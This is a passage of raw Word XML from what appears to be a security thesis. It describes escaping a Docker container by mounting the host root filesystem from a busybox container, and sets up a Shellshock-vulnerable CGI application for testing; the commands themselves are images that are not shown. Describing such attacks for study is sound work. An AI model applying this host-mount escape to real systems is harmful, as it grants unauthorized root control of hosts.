                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CED7B8" w14:textId="1E08CF87" w:rsidR="00033ED7" w:rsidRDefault="005871E1" w:rsidP="000924C7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc86858637"/>
      <w:bookmarkStart w:id="176" w:name="_Toc86867527"/>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000924C7" w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Docker images on the host.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="302E38B8" w14:textId="4A1F8471" w:rsidR="000924C7" w:rsidRDefault="008737F7" w:rsidP="000924C7">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009A7E23">
        <w:t xml:space="preserve">he attacker can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00000894">
        <w:t xml:space="preserve">run another </w:t>
      </w:r>
      <w:r>
        <w:t>intera</w:t>
      </w:r>
      <w:r w:rsidR="008A3E3B">
        <w:t xml:space="preserve">ctive </w:t>
      </w:r>
      <w:r w:rsidR="00000894">
        <w:t xml:space="preserve">container inside the </w:t>
      </w:r>
      <w:r>
        <w:t>container to</w:t>
      </w:r>
      <w:r w:rsidR="008A3E3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D60C3">
        <w:t>further</w:t>
      </w:r>
      <w:r w:rsidR="001D47CD">
        <w:t xml:space="preserve"> exploit the host system.</w:t>
      </w:r>
      <w:r w:rsidR="004C1527">
        <w:t xml:space="preserve"> In such a case,</w:t>
      </w:r>
      <w:r w:rsidR="00950F76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F6109">
        <w:t xml:space="preserve">a Linux </w:t>
      </w:r>
      <w:r w:rsidR="00ED4D59">
        <w:t xml:space="preserve">distro busybox </w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00ED4D59">
        <w:t xml:space="preserve">image is used to create a container </w:t>
      </w:r>
      <w:r w:rsidR="00B76A4C">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t xml:space="preserve"> provides shell access</w:t>
      </w:r>
      <w:r w:rsidR="00B76A4C">
        <w:t xml:space="preserve"> and mounts the root to the </w:t>
      </w:r>
      <w:r w:rsidR="009E7C85">
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r w:rsidR="00EC7C20">
        <w:t>filesystem on the host</w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC7C20">
        <w:t xml:space="preserve"> The commands used to create such </w:t>
      </w:r>
      <w:r w:rsidR="00AF41BC">
        <w:t xml:space="preserve">a container </w:t>
      </w:r>
      <w:r w:rsidR="00E70923">
        <w:t>are presented in figure 47.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA809F0" w14:textId="627D9707" w:rsidR="00E140FD" w:rsidRDefault="00E140FD" w:rsidP="00E140FD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115D710A" wp14:editId="5616E877">
            <wp:extent cx="4133850" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="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133850" cy="584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717C4D5" w14:textId="1E0AA112" w:rsidR="00E70923" w:rsidRDefault="00E70923" w:rsidP="005056AE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc86858638"/>
      <w:bookmarkStart w:id="178" w:name="_Toc86867528"/>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reating busybox container</w:t>
      </w:r>
      <w:r w:rsidR="005056AE" w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="4E2207ED" w14:textId="24A2D838" w:rsidR="009A3FE0" w:rsidRPr="009A3FE0" w:rsidRDefault="009E3129" w:rsidP="009A3FE0">
      <w:r>
        <w:t xml:space="preserve">The author leveraged the above container to </w:t>
      </w:r>
      <w:r w:rsidR="000055F4">
        <w:t>explore and exploit the host system, as show</w:t>
      </w:r>
      <w:r w:rsidR="00DF1549">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="000055F4">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00A960CA">
        <w:t xml:space="preserve"> figure 48.</w:t>
      </w:r>
      <w:r w:rsidR="00B25F03">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00C22BC7">
        <w:t>attacker has root privilege a</w:t>
      </w:r>
      <w:r w:rsidR="00DF111D">
        <w:t>nd thus can modify</w:t>
      </w:r>
      <w:r w:rsidR="005F4B14">
        <w:t>, delete, and create files on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177C992" w14:textId="4BBD9DA9" w:rsidR="00283713" w:rsidRDefault="00C16B0E" w:rsidP="00EA36C8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45334728" wp14:editId="392E5319">
            <wp:extent cx="5149850" cy="1176542"/>
            <wp:effectExtent l="0" t="0" r="0"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149850" cy="1176542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44562D8B" w14:textId="5D052646" w:rsidR="00645471" w:rsidRDefault="00645471" w:rsidP="00F52A51">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc86858639"/>
      <w:bookmarkStart w:id="180" w:name="_Toc86867529"/>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00F52A51" w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xploring the </w:t>
      </w:r>
      <w:r w:rsidR="00386AE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00F52A51" w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host directories.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="6CBAFDAE" w14:textId="56B392A8" w:rsidR="00F52A51" w:rsidRDefault="003F4F4A" w:rsidP="003F4F4A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc87032939"/>
      <w:r>
        <w:t>Vulnerable Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E2C5F" w14:textId="5BF9AA8A" w:rsidR="003F4F4A" w:rsidRDefault="009B4DFF" w:rsidP="003F4F4A">
      <w:r>
        <w:t>An application</w:t>
      </w:r>
      <w:r w:rsidR="00054BD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t xml:space="preserve">is downloaded from the public Docker </w:t>
      </w:r>
      <w:r w:rsidR="001C417E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t>ub repository</w:t>
      </w:r>
      <w:r w:rsidR="001C417E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DD41C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634223">
        <w:t>which is vulnerable to shellshock attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00540EBB">
        <w:t xml:space="preserve"> The container to run this application is </w:t>
      </w:r>
      <w:r w:rsidR="00D0418B">
        <w:t xml:space="preserve">started using the Docker commands shown in figure 49. </w:t>
      </w:r>
      <w:r w:rsidR="00C04326">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="009775C7">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009775C7">
        <w:t>particular container</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009775C7">
        <w:t xml:space="preserve"> exposes port 80 and ma</w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="004B58A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803008">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004B58A5">
        <w:t>port 8080 on the host</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t xml:space="preserve">; and thus, </w:t>
      </w:r>
      <w:r w:rsidR="00B10B5A">
        <w:t>external host</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B10B5A">
        <w:t xml:space="preserve"> can access the application via </w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>port 8080</w:t>
      </w:r>
      <w:r w:rsidR="0018447F">
        <w:t xml:space="preserve">, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00B164C6">
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="00DB185A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00614D46">
        <w:t xml:space="preserve"> Also, the container starts with a name exploit</w:t>
      </w:r>
      <w:r w:rsidR="000C3374">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F4775">
        <w:t xml:space="preserve"> In addition, the application is created using CGI</w:t>
      </w:r>
      <w:r w:rsidR="001C6C16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C6C16">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">script under the /usr/lib/cgi-bin directory on the </w:t>
      </w:r>
      <w:r w:rsidR="003B5EBA">
        <w:t>victim container.</w:t>
      </w:r>
      <w:r w:rsidR="001203EE">
        <w:t xml:space="preserve"> CGI is </w:t>
      </w:r>
      <w:r w:rsidR="00B8531C">
        <w:t>an executable program</w:t>
      </w:r>
      <w:r w:rsidR="00D871D4">
        <w:t>, usually</w:t>
      </w:r>
      <w:r w:rsidR="00C4667A">
        <w:t xml:space="preserve"> used</w:t>
      </w:r>
      <w:r w:rsidR="00D871D4">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00951C78">
        <w:t xml:space="preserve">handle user requests and </w:t>
      </w:r>
      <w:r w:rsidR="00C4667A">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00657E7A">
        <w:t>processing data on a web server</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1700044425"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:instrText xml:space="preserve"> CITATION Apa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[89]</w:t>
          </w:r>
          <w:r w:rsidR="00D26AF0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00657E7A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F3B6A" w14:textId="7AB1CF12" w:rsidR="00047F24" w:rsidRDefault="008D1E8C" w:rsidP="002935ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6257A6A1" wp14:editId="1A607FFD">
            <wp:extent cx="5731510" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="254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31510" cy="546100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FF8EB" w14:textId="58604333" w:rsidR="00D15973" w:rsidRDefault="00D15973" w:rsidP="006B5D2F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc86858640"/>
      <w:bookmarkStart w:id="183" w:name="_Toc86867530"/>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002D6DF9" w:rsidRPr="006B5D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tarting the container for the application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="7AB829A7" w14:textId="034DB981" w:rsidR="006B5D2F" w:rsidRPr="006B5D2F" w:rsidRDefault="00BD79FA" w:rsidP="006B5D2F">
      <w:r>
        <w:t xml:space="preserve">The screenshot below shows </w:t>
      </w:r>
      <w:r w:rsidR="008C1EFE">
        <w:t xml:space="preserve">the application is </w:t>
      </w:r>
      <w:r w:rsidR="00A23658">
        <w:t>accessed from the host machine via port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCA979" w14:textId="562C4277" w:rsidR="00B164C6" w:rsidRDefault="00B164C6" w:rsidP="002935ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2683838B" wp14:editId="0927DA09">
            <wp:extent cx="4362450" cy="2375520"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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368357" cy="2378737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEA625" w14:textId="7A599A15" w:rsidR="002D6DF9" w:rsidRDefault="002D6DF9" w:rsidP="006B5D2F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc86858641"/>
